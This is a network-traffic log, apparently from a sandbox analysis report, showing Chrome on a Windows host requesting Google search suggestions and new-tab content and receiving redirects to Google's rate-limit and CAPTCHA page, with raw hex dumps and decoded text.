2024-04-26 21:16:40 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 21:16:40 UTC	1703	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:16:40 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce--I2sm5sdX29RUo3LCX24bQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-04-26 21:16:40 UTC	780	IN	Data Raw: 33 30 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 63 68 69 63 61 67 6f 20 6e 66 6c 20 64 72 61 66 74 20 70 69 63 6b 73 22 2c 22 70 72 69 6d 65 20 6c 61 77 73 75 69 74 20 70 66 61 73 22 2c 22 6c 65 67 6f 20 61 72 74 65 6d 69 73 20 73 70 61 63 65 20 6c 61 75 6e 63 68 20 73 79 73 74 65 6d 22 2c 22 74 72 61 6e 73 66 6f 72 6d 65 72 73 20 6d 65 67 61 74 72 6f 6e 20 74 6f 79 22 2c 22 6e 61 73 61 20 6d 61 72 73 20 73 70 69 64 65 72 73 22 2c 22 73 74 61 6e 6c 65 79 20 63 75 70 20 70 6c 61 79 6f 66 66 73 20 62 72 61 63 6b 65 74 22 2c 22 72 65 64 64 69 74 20 6f 75 74 61 67 65 22 2c 22 6e 65 77 20 73 6d 79 72 6e 61 20 62 65 61 63 68 20 66 6c 6f 72 69 64 61 20 65 78 70 6c 6f 73 69 6f 6e 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d Data Ascii: 305)]}'["",["chicago nfl draft picks","prime lawsuit pfas","lego artemis space launch system","transformers megatron toy","nasa mars spiders","stanley cup playoffs bracket","reddit outage","new smyrna beach florida explosion"],["","","","","","","",""]
2024-04-26 21:16:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	142.250.217.228	443	7244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:16:40 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	142.250.217.228	443	7244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:16:40 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 21:16:41 UTC	1843	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGLizsLEGIjBzxD8y3zpVM4rvYXOzD0wZHGfxDV2C93K9X3HWoqlaBUqfM3Uck6U5jewh4t8bDhoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIuLOwsQYQ04Ou3AMSBGaBmNw Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Fri, 26 Apr 2024 21:16:41 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-26-21; expires=Sun, 26-May-2024 21:16:40 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=UowfF3gRb-VEPPE7VIYxDTZwjoWg8ud9RDcXC8lTIuA_racxo5lcoiIPCNawi8P-2VoGw5HUUmmcSiDTYaOtK75Zr8F2x6a3xTaKMIWLcX8zMSUJcARngZXAUOfcFD7ay0O3J-Bpq4ODfH4oORUkZCP-9pENI39m6kruvf_I5S4; expires=Sat, 26-Oct-2024 21:16:40 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 21:16:41 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49737	142.250.217.228	443	7244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:16:40 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 21:16:40 UTC	1761	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGLizsLEGIjAYi0E5THM4aIj8FUOrJpdUpPAhU1RG5ebUtVLBNvumYZ4qVuqJu7WbwqMCr0qqjPIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIuLOwsQYQ5pre7AISBGaBmNw Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Fri, 26 Apr 2024 21:16:40 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-04-26-21; expires=Sun, 26-May-2024 21:16:40 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=ik1S2gvbzXRLjVdx_Y5LJh0w0S_9_5d6ElFayBg60ugD7-6XcInlKtnDSWxvnZdc6RsT5sEwwdujmxNFQp8EP2ZapVOyxYy_Jrmtb15X64AkKhQiB3isKEgC-YcetiMg65hoSKrHKE1skUTiedEtj1AIYbPY_8XEjWEE9T0CDLM; expires=Sat, 26-Oct-2024 21:16:40 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 21:16:40 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	142.250.217.228	443	7244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:16:41 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 21:16:41 UTC	1703	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 21:16:41 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-dY3uXWheaxE6xb2YY-l7Mg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-04-26 21:16:41 UTC	1703	IN	Data Raw: 31 61 36 35 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6d 61 6e 6f 72 20 6c 6f 72 64 73 20 67 61 6d 65 22 2c 22 6a 61 63 6b 73 6f 6e 20 73 74 61 74 65 20 63 6f 61 63 68 20 74 6f 6d 65 6b 69 61 20 72 65 65 64 22 2c 22 77 65 61 74 68 65 72 20 73 74 6f 72 6d 73 20 74 6f 72 6e 61 64 6f 65 73 22 2c 22 73 68 61 6d 72 6f 63 6b 20 67 6f 6c 64 65 6e 20 72 65 74 72 69 65 76 65 72 20 70 75 70 70 79 22 2c 22 69 6e 74 65 6c 20 73 74 6f 63 6b 20 65 61 72 6e 69 6e 67 73 22 2c 22 77 6f 72 64 6c 65 20 74 6f 64 61 79 20 61 6e 73 77 65 72 20 61 70 72 69 6c 20 32 36 22 2c 22 63 61 69 74 6c 69 6e 20 63 6c 61 72 6b 22 2c 22 6e 61 73 61 20 6d 61 72 73 20 73 70 69 64 65 72 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f Data Ascii: 1a65)]}'["",["manor lords game","jackson state coach tomekia reed","weather storms tornadoes","shamrock golden retriever puppy","intel stock earnings","wordle today answer april 26","caitlin clark","nasa mars spiders"],["","","","","","","",""],[],{"go
2024-04-26 21:16:41 UTC	1703	IN	Data Raw: 71 61 6b 38 35 52 7a 52 72 52 55 38 77 52 57 34 79 53 6a 64 75 4e 44 41 76 5a 6a 68 42 4d 47 5a 71 61 55 64 30 62 55 46 32 4d 32 74 36 4e 54 63 32 4f 45 5a 4b 61 6a 49 78 62 54 6c 43 4e 6d 78 79 59 55 4a 30 4d 47 70 7a 64 32 73 79 65 44 68 75 63 30 4a 75 53 47 49 33 62 6d 70 57 63 33 5a 79 54 6c 46 35 61 57 52 77 62 48 6c 6a 57 6b 4a 4b 52 32 5a 4a 4d 57 5a 51 62 58 6b 78 4e 30 39 6c 63 33 49 35 52 47 34 72 52 33 67 31 52 32 64 79 4f 56 68 77 57 6d 4a 49 56 7a 4e 44 56 58 4a 30 63 44 52 70 4e 6d 68 31 65 6b 34 79 56 57 5a 4b 64 31 42 75 55 33 52 56 5a 58 4d 30 52 54 4e 69 53 6e 46 6f 61 58 5a 4b 52 7a 68 45 56 6b 51 32 63 6e 5a 56 4f 54 64 7a 4d 47 78 49 52 6c 55 35 54 30 39 61 62 45 78 7a 65 46 6c 6e 63 55 64 43 55 45 67 33 59 58 4d 35 63 57 4e 61 54 55 Data Ascii: qak85RzRrRU8wRW4ySjduNDAvZjhBMGZqaUd0bUF2M2t6NTc2OEZKajIxbTlCNmxyYUJ0MGpzd2syeDhuc0JuSGI3bmpWc3ZyTlF5aWRwbHljWkJKR2ZJMWZQbXkxN09lc3I5RG4rR3g1R2dyOVhwWmJIVzNDVXJ0cDRpNmh1ek4yVWZKd1BuU3RVZXM0RTNiSnFoaXZKRzhEVkQ2cnZVOTdzMGxIRlU5T09abExzeFlncUdCUEg3YXM5cWNaTU
2024-04-26 21:16:41 UTC	1703	IN	Data Raw: 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 67 6f 6f 67 6c 65 3a 65 6e 74 69 74 79 69 6e 66 6f 22 3a 22 43 67 30 76 5a 79 38 78 4d 57 31 33 4e 32 6f 32 65 47 74 6d 45 68 70 42 62 57 56 79 61 57 4e 68 62 69 42 69 59 58 4e 72 5a 58 52 69 59 57 78 73 49 48 42 73 59 58 6c 6c 63 6a 4b 58 45 47 52 68 64 47 45 36 61 57 31 68 5a 32 55 76 61 6e 42 6c 5a 7a 74 69 59 58 4e 6c 4e 6a 51 73 4c 7a 6c 71 4c 7a 52 42 51 56 46 54 61 31 70 4b 55 6d 64 42 51 6b 46 52 51 55 46 42 55 55 46 43 51 55 46 45 4c 7a 4a 33 51 30 56 42 51 57 74 48 51 6e 64 6e 53 45 4a 6e 61 30 6c 43 64 32 64 4c 51 32 64 72 54 45 52 53 57 56 42 45 55 58 64 4e 52 46 Data Ascii: 10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMW13N2o2eGtmEhpBbWVyaWNhbiBiYXNrZXRiYWxsIHBsYXllcjKXEGRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRF
2024-04-26 21:16:41 UTC	1656	IN	Data Raw: 64 75 4f 44 46 77 4d 6a 5a 4e 4e 44 64 6f 55 55 52 71 65 58 64 53 61 6b 68 31 51 6c 64 6b 62 32 55 33 51 32 5a 77 56 6d 68 71 64 45 46 4b 52 55 68 79 61 6e 56 42 62 6b 68 6a 53 6e 6c 6f 55 6a 6c 51 52 44 4a 4f 57 54 4a 79 4e 33 4d 79 59 6c 46 6f 62 48 68 6f 57 6c 68 4d 5a 6c 4e 50 65 55 74 31 62 46 4d 79 61 30 73 7a 54 7a 4e 42 56 57 52 78 53 46 6c 71 62 44 52 7a 62 48 68 57 53 58 51 35 63 47 31 53 61 54 46 73 54 48 46 49 56 32 35 49 54 33 42 51 54 30 59 33 51 56 6b 76 5a 30 4e 77 62 48 4a 4f 62 46 70 5a 5a 57 5a 4d 55 6a 6c 6f 61 43 39 56 4f 48 4e 5a 53 6d 46 4e 4f 57 39 34 53 46 64 77 53 6c 4e 50 63 46 4e 48 4d 6a 46 4d 53 31 4e 76 62 6d 78 49 61 56 49 33 5a 56 42 79 55 57 4a 77 59 54 5a 31 55 30 35 5a 57 45 74 56 64 33 4e 77 4b 31 70 6a 56 7a 68 72 61 Data Ascii: duODFwMjZNNDdoUURqeXdSakh1Qldkb2U3Q2ZwVmhqdEFKRUhyanVBbkhjSnloUjlQRDJOWTJyN3MyYlFobHhoWlhMZlNPeUt1bFMya0szTzNBVWRxSFlqbDRzbHhWSXQ5cG1SaTFsTHFIV25IT3BQT0Y3QVkvZ0NwbHJObFpZZWZMUjloaC9VOHNZSmFNOW94SFdwSlNPcFNHMjFMS1NvbmxIaVI3ZVByUWJwYTZ1U05ZWEtVd3NwK1pjVzhra
2024-04-26 21:16:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	142.250.217.228	443	7244	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 21:16:41 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGLizsLEGIjAYi0E5THM4aIj8FUOrJpdUpPAhU1RG5ebUtVLBNvumYZ4qVuqJu7WbwqMCr0qqjPIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-04-26-21; NID=513=ik1S2gvbzXRLjVdx_Y5LJh0w0S_9_5d6ElFayBg60ugD7-6XcInlKtnDSWxvnZdc6RsT5sEwwdujmxNFQp8EP2ZapVOyxYy_Jrmtb15X64AkKhQiB3isKEgC-YcetiMg65hoSKrHKE1skUTiedEtj1AIYbPY_8XEjWEE9T0CDLM
2024-04-26 21:16:41 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 26 Apr 2024 21:16:41 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3114 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-26 21:16:41 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-04-26 21:16:41 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 77 64 6a 56 5f 61 36 35 54 77 44 35 76 56 35 5a 71 33 4a 72 41 2d 41 75 79 75 76 71 6a 4d 69 54 5f Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" 